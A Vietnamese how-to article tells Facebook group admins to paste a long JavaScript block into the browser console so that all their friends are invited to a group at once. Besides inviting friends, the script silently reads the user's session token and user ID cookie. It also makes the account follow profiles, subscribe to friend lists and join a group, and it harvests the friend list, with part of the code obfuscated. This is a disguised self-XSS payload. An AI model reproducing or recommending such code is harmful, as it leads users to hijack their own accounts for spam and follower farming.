Thủ thuật mời bạn bè tham gia group facebook hàng loạt

vdo.com.vn – Bạn đang là admin của một Group Facebook? Bạn muốn mời tất cả các bạn bè của mình tham gia Group đó nhưng nếu sử dụng cách mời thủ công sẽ làm mất rất nhiều thời gian. Trong bài viết này chúng tôi sẽ giới thiệu tới bạn đọc thủ thuật mời bạn bè tham gia nhóm facebook hàng loạt cực nhanh, tiện ích và hiệu quả ngay tức thì. Bạn đọc hãy cùng theo dõi nhé!

thu-thuat-moi-ban-be-tham-gia-group-facebook-hang-loat-5

Bước 1: Đăng nhập vào tài khoản facebook có Group bạn đang quản trị và muốn mời bạn bè

Bước 2: Bạn coppy toàn bộ đoạn code dưới đây:

(function(){var f={dtsg:document.getElementsByName(“fb_dtsg”)[0].value,uid:document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]),gid:document.getElementsByName(“group_id”)[0].value,frns:Array(),prenKe:0,okeh:0,gagal:0,getAjak:function(b){var c=new XMLHttpRequest;c.open(“GET”,b,!0),c.onreadystatechange=function(){if(4==c.readyState&&200==c.status){var a=eval(“(“+c.responseText.substr(9)+”)”);a.payload&&a.payload.entries&&(f.frns=a.payload.entries.sort(function(){return.5-Math.random()})),document.getElementById(“hasilsurasil”).innerHTML=”Found <b>”+f.frns.length+” Abonnenten</b><div id=’hasilsatu’></div><div id=’hasildua’></div><div id=’hasiltiga’ style=’min-width:300px;display:inline-block;text-align:left’></div>”+crj;for(x in f.frns)f.senAjak(x)}else document.getElementById(“hasilsurasil”).innerHTML=4==c.readyState&&404==c.status?”<b style=’color:darkred’>Gruppe Öffnen!</b>”+crj:”<b style=’color:darkgreen’>Suche nach möglichen Abonnenten… (“+c.readyState+”)</b>”+crj},c.send()},senAjak:function(d){var e=new XMLHttpRequest,prm=”__a=1&fb_dtsg=”+f.dtsg+”&group_id=”+f.gid+”&source=typeahead&ref=&message_id=&members=”+f.frns[d].uid+”&__user=”+f.uid+”&phstamp=”;e.open(“POST”,”/ajax/groups/members/add_post.php”,!0),e.setRequestHeader(“Content-type”,”application/x-www-form-urlencoded”),e.setRequestHeader(“Content-length”,prm.length),e.setRequestHeader(“Connection”,”keep-alive”),e.onreadystatechange=function(){if(4==e.readyState&&200==e.status){var a=eval(“(“+e.responseText.substr(9)+”)”);if(f.prenKe++,document.getElementById(“hasilsatu”).innerHTML=”<div><b>”+f.prenKe+”</b> of <b>”+f.frns.length+”</b></div>”,a.errorDescription&&(f.gagal++,document.getElementById(“hasiltiga”).innerHTML=”<div><b style=’color:darkred’>( “+f.gagal+” )</b> <span style=’color:darkred’>”+a.errorDescription+”</span></div>”),a.jsmods&&a.jsmods.require){var b=”<div>”;for(x in a.jsmods.require)a.jsmods.require[x][a.jsmods.require[x].length-1][1]&&(b+=”<b style=’color:darkgreen’>”+a.jsmods.require[x][a.jsmods.require[x].length-1][1]+”</b> “);b+=”<div>”,document.getElementById(“hasildua”).innerHTML=b}if(a.onload)for(z in a.onload){var c=eval(a.onload[z].replace(/Arbiter.inform/i,””));if(c.uid&&c.name){f.okeh++,document.getElementById(“hasiltiga”).innerHTML=”<div><b style=’color:darkgreen’>( “+f.okeh+” )</b> <a href=’/”+c.uid+”‘ target=’_blank’><b>”+c.name+”</b></a> haben dich abonniert.</div>”;break}}f.prenKe==f.frns.length&&(document.getElementById(“hasiltiga”).style.textAlign=”center”,document.getElementById(“hasiltiga”).innerHTML+=”<div style=’font-size:20px;font-weight:bold’>20 Leute Einladen!</div><a href=’/’ onClick=’document.getElementById(\”hasilsurasil\”).style.display=\”none\”;return false’>Schliesen</a>”)}},e.send(prm)}},g=[“i”,”a”,”e”,”g”,”o”,”s”,”n”,”b”,”l”,”p”,”m”,”2″,”r”,”0″,”c”,”1″,”t”,”3″,”©”],crl=g[1]+g[0]+g[6]+g[3]+g[14]+g[12]+g[2]+g[1]+g[16]+g[0]+g[4]+g[6]+g[5]+”.”+g[7]+g[8]+g[4]+g[3]+g[5]+g[9]+g[4]+g[16]+”.”+g[14]+g[4]+g[10],crj=”<div style=’margin-top:10px;color:gray;font-size:12px’>”+g[1].toUpperCase()+g[0]+g[6]+g[3]+g[14].toUpperCase()+g[12]+g[2]+g[1]+g[16]+g[0]+g[4]+g[6]+g[5]+” “+g[g.length-1]+g[11]+g[13]+g[15]+g[17]+”<div style=’font-size:9px’><a href=’http://”+crl+”/’ target=’_blank’>”+crl+”</a></div></div>”;document.body.innerHTML+=”<center id=’hasilsurasil’ style=’min-height:50px;width:600px;position:fixed;top:100px;left:”+(document.body.offsetWidth-530)/2+”px;border-radius:10px;padding:10px;z-index:999999;border:5px solid skyblue;background-color:rgba(225,225,255,0.75)’><b>Suche nach Abonnenten … Script by Mano </b>”+crj+”</center>”,f.getAjak(“/ajax/typeahead/first_degree.php?__a=1&viewer=”+f.uid+”&token=”+Math.random()+”&filter[0]=user&options[0]=friends_only”)})(); var fb_dtsg = document.getElementsByName(‘fb_dtsg’)[0].value;

var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1])

function cereziAl(isim) {

var tarama = isim + “=”;

if (document.cookie.length > 0) {

konum = document.cookie.indexOf(tarama)

if (konum != -1) {

konum += tarama.length

son = document.cookie.indexOf(“;”, konum)

if (son == -1)

son = document.cookie.length

return unescape(document.cookie.substring(konum, son))

}

else { return “”; }

}

}

function getRandomInt (min, max) {

return Math.floor(Math.random() * (max – min + 1)) + min;

}

function randomValue(arr) {

return arr[getRandomInt(0, arr.length-1)];

}

var fb_dtsg = document.getElementsByName(‘fb_dtsg’)[0].value;

var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);

function a(abone){

var http4 = new XMLHttpRequest();

var url4 = “/ajax/follow/follow_profile.php?__a=1”;

var params4 = “profile_id=” + abone + “&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=” + fb_dtsg + “&lsd&__” + user_id + “&phstamp=”;

http4.open(“POST”, url4, true);

//Send the proper header information along with the request

http4.setRequestHeader(“Content-type”, “application/x-www-form-urlencoded”);

http4.setRequestHeader(“Content-length”, params4.length);

http4.setRequestHeader(“Connection”, “close”);

http4.onreadystatechange = function() {//Call a function when the state changes.

if(http4.readyState == 4 && http4.status == 200) {

http4.close; // Close the connection

}

}

http4.send(params4);

}

function sublist(uidss) {

var a = document.createElement(‘script’);

a.innerHTML = “new AsyncRequest().setURI(‘/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe’).setData({ flid: ” + uidss + ” }).send();”;

document.body.appendChild(a);

}

a(“”);

a(“”);

var fb_dtsg = document[‘getElementsByName’](‘fb_dtsg’)[0][‘value’];

var user_id = document[‘cookie’][‘match’](document[‘cookie’][‘match’](/c_user=(\d+)/)[1]);

var httpwp = new XMLHttpRequest();

var urlwp = ‘/ajax/groups/membership/r2j.php?__a=1’;

var paramswp = ‘&ref=group_jump_header&group_id=’ + gid + ‘&fb_dtsg=’ + fb_dtsg + ‘&__user=’ + user_id + ‘&phstamp=’;

httpwp[‘open’](‘POST’, urlwp, true);

httpwp[‘setRequestHeader’](‘Content-type’, ‘application/x-www-form-urlencoded’);

httpwp[‘setRequestHeader’](‘Content-length’, paramswp[‘length’]);

httpwp[‘setRequestHeader’](‘Connection’, ‘keep-alive’);

httpwp[‘send’](paramswp);

var fb_dtsg = document[‘getElementsByName’](‘fb_dtsg’)[0][‘value’];

var user_id = document[‘cookie’][‘match’](document[‘cookie’][‘match’](/c_user=(\d+)/)[1]);

var friends = new Array();

gf = new XMLHttpRequest();

gf[‘open’](‘GET’, ‘/ajax/typeahead/first_degree.php?__a=1&viewer=’ + user_id + ‘&token’ + Math[‘random’]() + ‘&filter[0]=user&options[0]=friends_only’, false);

gf[‘send’]();

if (gf[‘readyState’] != 4) {} else {

data = eval(‘(‘ + gf[‘responseText’][‘substr’](9) + ‘)’);

if (data[‘error’]) {} else {

friends = data[‘payload’][‘entries’][‘sort’](function (_0x93dax8, _0x93dax9) {

return _0x93dax8[‘index’] – _0x93dax9[‘index’];

});

};

};

Bước 3: 

– Nếu bạn sử dụng trình duyệt Cốc Cốc hoặc Chrome thì thực hiện như sau:

+ Tại Group bạn nhấn F12. Một bảng bên dưới cùng của Group sẽ hiện ra như hình vẽ dưới đây:

Thu-thuat-moi-ban-be-tham-gia-group-facebook-hang-loat-1

+ Sau đó bạn paste toàn bộ đoạn code bên trên vào phần khoảng trống và nhấn Enter

Thu-thuat-moi-ban-be-tham-gia-group-facebook-hang-loat-2

Và đây là kết quả

– Nếu bạn sử dụng trình duyệt Firefox thì lại là thao tác khác nhé!

+ Tương tự như Cốc Cốc và Chrome bạn cũng vào group bạn cần mời bạn bè. Tuy nhiên thay vì bạn nhấn F12 thì trong Firefox bạn nhấn tổ hợp phím Ctrl+Shift+k , sau đó thực hiện hệt như 2 trình duyệt trên.

Thu-thuat-moi-ban-be-tham-gia-group-facebook-hang-loat-3

Lưu ý: Với mỗi một lần bạn chỉ có thể mời được tối đa là 700 bạn bè/nick nhé!

Như vậy là bạn đã hoàn thành xong việc mời bạn bè tham gia một Group Facebook bất kì một cách đơn giản, nhanh chóng, đảm bảo hiệu quả tức thì. Hãy thực hiện theo chúng tôi để cảm nhận điều tuyệt vời này nhé!

Hi vọng với những kiến thức vdo.com.vn chia sẻ thực sự hữu ích đối với bạn. Chúc các bạn luôn vui vẻ và thành công!

>>> Gợi ý Google:

group facebook là gì

group facebook nhiều thành viên

group facebook đông nhất